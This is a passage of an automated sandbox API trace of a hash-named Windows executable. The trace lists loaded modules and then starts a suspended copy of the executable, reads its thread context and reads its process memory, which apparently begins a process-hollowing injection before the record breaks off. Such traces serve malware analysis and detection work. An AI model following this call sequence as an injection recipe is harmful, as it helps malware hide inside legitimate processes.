lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\8062d427acd64e37f4fded7b00f4a869\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\8062d427acd64e37f4fded7b00f4a869\\mscorlib.ni.dll")) returned 0x68 [0167.732] CoTaskMemFree (pv=0x8b4c68) [0167.732] GetModuleInformation (in: hProcess=0x2e4, hModule=0x75360000, lpmodinfo=0x227b960, cb=0xc | out: lpmodinfo=0x227b960*(lpBaseOfDll=0x75360000, SizeOfImage=0xeb000, EntryPoint=0x7539d650)) returned 1 [0167.733] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.733] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75360000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0167.737] CoTaskMemFree (pv=0x8b4c68) [0167.737] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.737] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75360000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")) returned 0x1d [0167.738] CoTaskMemFree (pv=0x8b4c68) [0167.738] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6fef0000, lpmodinfo=0x227da64, cb=0xc | out: lpmodinfo=0x227da64*(lpBaseOfDll=0x6fef0000, SizeOfImage=0x75000, EntryPoint=0x6ff29a60)) returned 1 [0167.739] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.739] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6fef0000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="uxtheme.dll") returned 0xb [0167.739] CoTaskMemFree (pv=0x8b4c68) [0167.739] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.739] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6fef0000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")) returned 0x1f [0167.740] CoTaskMemFree (pv=0x8b4c68) [0167.740] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6f820000, lpmodinfo=0x227fb70, cb=0xc | out: lpmodinfo=0x227fb70*(lpBaseOfDll=0x6f820000, SizeOfImage=0x13000, EntryPoint=0x6f829950)) returned 1 [0167.741] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.741] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6f820000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="CRYPTSP.dll") returned 0xb [0167.741] CoTaskMemFree (pv=0x8b4c68) [0167.741] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.741] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6f820000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPTSP.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll")) returned 0x1f [0167.742] CoTaskMemFree (pv=0x8b4c68) [0167.742] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6f7f0000, lpmodinfo=0x2281c7c, cb=0xc | out: lpmodinfo=0x2281c7c*(lpBaseOfDll=0x6f7f0000, SizeOfImage=0x2f000, EntryPoint=0x6f8095e0)) returned 1 [0167.743] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.743] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6f7f0000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="rsaenh.dll") returned 0xa [0167.746] CoTaskMemFree (pv=0x8b4c68) [0167.746] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.746] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6f7f0000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")) returned 0x1e [0167.747] CoTaskMemFree (pv=0x8b4c68) [0167.747] GetModuleInformation (in: hProcess=0x2e4, hModule=0x73ae0000, lpmodinfo=0x2283d88, cb=0xc | out: lpmodinfo=0x2283d88*(lpBaseOfDll=0x73ae0000, SizeOfImage=0x1b000, EntryPoint=0x73ae9050)) returned 1 [0167.748] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.748] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x73ae0000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="bcrypt.dll") returned 0xa [0167.749] CoTaskMemFree (pv=0x8b4c68) [0167.749] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.749] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x73ae0000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")) returned 0x1e [0167.750] CoTaskMemFree (pv=0x8b4c68) [0167.750] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c850000, lpmodinfo=0x2285e94, cb=0xc | out: lpmodinfo=0x2285e94*(lpBaseOfDll=0x6c850000, SizeOfImage=0x7e000, EntryPoint=0x6c851140)) returned 1 [0167.751] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.751] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c850000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="clrjit.dll") returned 0xa [0167.752] CoTaskMemFree (pv=0x8b4c68) [0167.752] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.752] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c850000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll")) returned 0x38 [0167.752] CoTaskMemFree (pv=0x8b4c68) [0167.752] GetModuleInformation (in: hProcess=0x2e4, hModule=0x75b00000, lpmodinfo=0x2287fd4, cb=0xc | out: lpmodinfo=0x2287fd4*(lpBaseOfDll=0x75b00000, SizeOfImage=0x92000, EntryPoint=0x75b38cf0)) returned 1 [0167.753] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.753] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75b00000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0167.754] CoTaskMemFree (pv=0x8b4c68) [0167.754] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.754] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75b00000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\OLEAUT32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")) returned 0x20 [0167.755] CoTaskMemFree (pv=0x8b4c68) [0167.755] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6ad40000, lpmodinfo=0x228a0e8, cb=0xc | out: lpmodinfo=0x228a0e8*(lpBaseOfDll=0x6ad40000, SizeOfImage=0x9ac000, EntryPoint=0x0)) returned 1 [0167.759] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.759] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6ad40000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="System.ni.dll") returned 0xd [0167.760] CoTaskMemFree (pv=0x8b4c68) [0167.760] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.760] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6ad40000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\cc4e5d110dd318e8b7d61a9ed184ab74\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\cc4e5d110dd318e8b7d61a9ed184ab74\\system.ni.dll")) returned 0x64 [0167.761] CoTaskMemFree (pv=0x8b4c68) [0167.761] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c4c0000, lpmodinfo=0x228c284, cb=0xc | out: lpmodinfo=0x228c284*(lpBaseOfDll=0x6c4c0000, SizeOfImage=0x18d000, EntryPoint=0x0)) returned 1 [0167.762] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.762] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c4c0000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="System.Drawing.ni.dll") returned 0x15 [0167.762] CoTaskMemFree (pv=0x8b4c68) [0167.762] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.763] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c4c0000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\9b645a48c9bcfc95aaadf6a069bb4ebe\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\9b645a48c9bcfc95aaadf6a069bb4ebe\\system.drawing.ni.dll")) returned 0x74 [0167.763] CoTaskMemFree (pv=0x8b4c68) [0167.763] GetModuleInformation (in: hProcess=0x2e4, hModule=0x68bf0000, lpmodinfo=0x228e55c, cb=0xc | out: lpmodinfo=0x228e55c*(lpBaseOfDll=0x68bf0000, SizeOfImage=0xc59000, EntryPoint=0x0)) returned 1 [0167.764] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.764] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x68bf0000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="System.Windows.Forms.ni.dll") returned 0x1b [0167.765] CoTaskMemFree (pv=0x8b4c68) [0167.765] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.765] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x68bf0000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\8cd2187094ba6cade0ca0fab4f932654\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\8cd2187094ba6cade0ca0fab4f932654\\system.windows.forms.ni.dll")) returned 0x80 [0167.766] CoTaskMemFree (pv=0x8b4c68) [0167.766] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c7b0000, lpmodinfo=0x229074c, cb=0xc | out: lpmodinfo=0x229074c*(lpBaseOfDll=0x6c7b0000, SizeOfImage=0x92000, EntryPoint=0x6c7bdd60)) returned 1 [0167.767] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.767] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c7b0000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="comctl32.dll") returned 0xc [0167.768] CoTaskMemFree (pv=0x8b4c68) [0167.768] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.768] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c7b0000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll")) returned 0x78 [0167.769] CoTaskMemFree (pv=0x8b4c68) [0167.769] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6f730000, lpmodinfo=0x2292910, cb=0xc | out: lpmodinfo=0x2292910*(lpBaseOfDll=0x6f730000, SizeOfImage=0x1d000, EntryPoint=0x6f733b10)) returned 1 [0167.770] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.770] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6f730000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="dwmapi.dll") returned 0xa [0167.771] CoTaskMemFree (pv=0x8b4c68) [0167.771] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.771] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6f730000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll")) returned 0x1e [0167.772] CoTaskMemFree (pv=0x8b4c68) [0167.772] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c3f0000, lpmodinfo=0x2294a1c, cb=0xc | out: lpmodinfo=0x2294a1c*(lpBaseOfDll=0x6c3f0000, SizeOfImage=0xc5000, EntryPoint=0x0)) returned 1 [0167.773] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.773] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c3f0000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="System.Runtime.Remoting.ni.dll") returned 0x1e [0167.773] CoTaskMemFree (pv=0x8b4c68) [0167.773] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.773] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c3f0000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Runt73a1fc9d#\\8d483c399064a7bdd1f920630af5a265\\System.Runtime.Remoting.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.runt73a1fc9d#\\8d483c399064a7bdd1f920630af5a265\\system.runtime.remoting.ni.dll")) returned 0x83 [0167.774] CoTaskMemFree (pv=0x8b4c68) [0167.774] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6d300000, lpmodinfo=0x2296c18, cb=0xc | out: lpmodinfo=0x2296c18*(lpBaseOfDll=0x6d300000, SizeOfImage=0xd000, EntryPoint=0x6d3063e0)) returned 1 [0167.775] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.775] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6d300000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="amsi.dll") returned 0x8 [0167.776] CoTaskMemFree (pv=0x8b4c68) [0167.776] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.776] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6d300000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll")) returned 0x1c [0167.777] CoTaskMemFree (pv=0x8b4c68) [0167.777] GetModuleInformation (in: hProcess=0x2e4, hModule=0x684d0000, lpmodinfo=0x2298d1c, cb=0xc | out: lpmodinfo=0x2298d1c*(lpBaseOfDll=0x684d0000, SizeOfImage=0x712000, EntryPoint=0x0)) returned 1 [0167.781] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.781] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x684d0000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="System.Core.ni.dll") returned 0x12 [0167.782] CoTaskMemFree (pv=0x8b4c68) [0167.782] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.782] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x684d0000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\abad45b9cc652ba7e38c4c837234c0ab\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\abad45b9cc652ba7e38c4c837234c0ab\\system.core.ni.dll")) returned 0x6e [0167.783] CoTaskMemFree (pv=0x8b4c68) [0167.783] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74920000, lpmodinfo=0x229aed8, cb=0xc | out: lpmodinfo=0x229aed8*(lpBaseOfDll=0x74920000, SizeOfImage=0x6000, EntryPoint=0x74921460)) returned 1 [0167.784] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.784] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74920000, lpBaseName=0x8b4c68, nSize=0x800 | out: lpBaseName="psapi.dll") returned 0x9 [0167.785] CoTaskMemFree (pv=0x8b4c68) [0167.785] CoTaskMemAlloc (cb=0x804) returned 0x8b4c68 [0167.785] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74920000, lpFilename=0x8b4c68, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")) returned 0x1d [0167.787] CoTaskMemFree (pv=0x8b4c68) [0167.787] CloseHandle (hObject=0x2e4) returned 1 [0167.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateProcessA", cchWideChar=14, lpMultiByteStr=0x19cb74, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateProcessAd", lpUsedDefaultChar=0x0) returned 14 [0167.787] GetProcAddress (hModule=0x74610000, lpProcName="CreateProcessA") returned 0x74650750 [0167.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe", cchWideChar=98, lpMultiByteStr=0x19e130, cbMultiByte=100, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exed", lpUsedDefaultChar=0x0) returned 98 [0167.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x19e12c, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0á\x19", lpUsedDefaultChar=0x0) returned 0 [0167.930] CreateProcessA (in: lpApplicationName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe", lpCommandLine="", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19e1c8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19e324 | out: lpCommandLine="", lpProcessInformation=0x19e324*(hProcess=0x2e8, hThread=0x2e4, dwProcessId=0x148, dwThreadId=0x4dc)) returned 1 [0168.018] CoTaskMemFree (pv=0x0) [0168.018] GetThreadContext (in: hThread=0x2e4, lpContext=0x229d8fc | out: lpContext=0x229d8fc*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x2c1000, Edx=0x0, Ecx=0x0, Eax=0x46fdc2, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0168.022] ReadProcessMemory (in: hProcess=0x2e8, lpBaseAddress=0x2c1008, lpBuffer=0x19e30c, nSize=0x4, 